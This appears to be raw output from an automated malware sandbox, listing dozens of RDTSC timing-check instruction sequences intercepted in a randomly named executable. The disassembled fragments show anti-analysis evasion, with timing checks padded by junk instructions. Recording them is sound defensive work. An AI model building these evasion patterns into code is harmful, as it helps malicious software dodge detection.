Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C92C8 second address: 4C92F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD1807ED553h 0x0000000b popad 0x0000000c jl 00007FD1807ED564h 0x00000012 js 00007FD1807ED54Eh 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C92F2 second address: 4C92F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C92F9 second address: 4C9301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8B5C second address: 4C8B89 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007FD180B5C156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD180B5C15Eh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FD180B5C158h 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 pop eax 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8CD0 second address: 4C8CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4CC75A second address: 4CC760 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4CC8EF second address: 4CC8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4D2965 second address: 4D2969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 476BD1 second address: 476BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED54Ch 0x00000009 popad 0x0000000a js 00007FD1807ED54Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4D928F second address: 4D92B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD180B5C168h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4D93FA second address: 4D9418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED553h 0x00000009 jg 00007FD1807ED546h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4D9572 second address: 4D9580 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD180B5C156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4D9580 second address: 4D9584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4D9584 second address: 4D958A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4D9BA5 second address: 4D9BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007FD1807ED54Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4D9BB8 second address: 4D9BC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD180B5C156h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DA9B9 second address: 4DA9BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DACCB second address: 4DACD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FD180B5C156h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DACD7 second address: 4DACE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DAFB5 second address: 4DAFCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD180B5C15Fh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DAFCC second address: 4DAFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DFF6F second address: 4DFF75 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DEFB5 second address: 4DEFB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DEFB9 second address: 4DEFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DEFBF second address: 4DEFDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD1807ED551h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DF190 second address: 4DF194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DF50A second address: 4DF514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FD1807ED546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DF514 second address: 4DF52A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FD180B5C15Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4EE50D second address: 4EE517 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD1807ED546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4EE517 second address: 4EE523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4EC6A8 second address: 4EC6C2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD1807ED54Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECC3B second address: 4ECC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECC3F second address: 4ECC57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FD1807ED550h 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECC57 second address: 4ECC6E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FD180B5C15Eh 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECC6E second address: 4ECC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED559h 0x00000009 jnp 00007FD1807ED546h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECC9A second address: 4ECCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD180B5C156h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD180B5C162h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECCB9 second address: 4ECCBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECCBD second address: 4ECCD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD180B5C15Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECCD4 second address: 4ECCD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECCD8 second address: 4ECCDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECCDC second address: 4ECCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ED409 second address: 4ED416 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FD180B5C156h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4EE36B second address: 4EE3A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FD1807ED546h 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d ja 00007FD1807ED546h 0x00000013 popad 0x00000014 jmp 00007FD1807ED555h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD1807ED54Bh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4EC173 second address: 4EC177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4EC177 second address: 4EC197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 pop eax 0x00000012 jo 00007FD1807ED546h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4EC197 second address: 4EC1A5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD180B5C158h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4EC1A5 second address: 4EC1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED554h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 42E5DA second address: 42E5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 42E5DE second address: 42E5E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4F3BB5 second address: 4F3BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4F3BBB second address: 4F3BD3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD1807ED54Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4F3EA2 second address: 4F3EA7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4F64AE second address: 4F64E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jng 00007FD1807ED546h 0x0000000e jmp 00007FD1807ED551h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD1807ED550h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4F64E2 second address: 4F64E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 50190E second address: 50193C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007FD1807ED551h 0x0000000b jmp 00007FD1807ED54Bh 0x00000010 pushad 0x00000011 jmp 00007FD1807ED54Ch 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 jo 00007FD1807ED54Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 504C64 second address: 504C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 5086CB second address: 508718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED54Fh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD1807ED54Ch 0x00000011 jc 00007FD1807ED56Bh 0x00000017 jmp 00007FD1807ED555h 0x0000001c jmp 00007FD1807ED550h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 5080AF second address: 5080B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 5080B3 second address: 5080C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 5080C3 second address: 5080C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 51B106 second address: 51B11F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD1807ED54Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FD1807ED56Eh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 51B11F second address: 51B125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 51B125 second address: 51B138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD1807ED546h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 51B138 second address: 51B13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 521DFD second address: 521E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FD1807ED54Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 521E11 second address: 521E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD180B5C167h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 521F8C second address: 521F9B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007FD1807ED546h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 521F9B second address: 521FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD180B5C156h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 521FA8 second address: 521FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FD1807ED546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 52214F second address: 522155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 522155 second address: 522162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 522162 second address: 522168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 522403 second address: 522430 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD1807ED555h 0x0000000c jmp 00007FD1807ED550h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 522430 second address: 522438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 522438 second address: 52243C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 5226D8 second address: 5226DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 5226DC second address: 5226F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FD1807ED546h 0x0000000e jmp 00007FD1807ED54Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 5226F4 second address: 522704 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 522704 second address: 522715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FD1807ED546h 0x00000009 jno 00007FD1807ED546h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 524A26 second address: 524A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 5348FE second address: 534906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 534906 second address: 53492E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C165h 0x00000009 jmp 00007FD180B5C15Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 548C7E second address: 548C8E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD1807ED546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56632F second address: 566335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 566335 second address: 566345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FD1807ED54Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565227 second address: 565244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD180B5C167h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565244 second address: 565249 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565249 second address: 56525D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD180B5C15Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56565C second address: 565671 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED551h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565C4D second address: 565C58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007FD180B5C156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565EEF second address: 565F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007FD1807ED559h 0x0000000b popad 0x0000000c pushad 0x0000000d js 00007FD1807ED552h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565F17 second address: 565F1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565F1D second address: 565F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
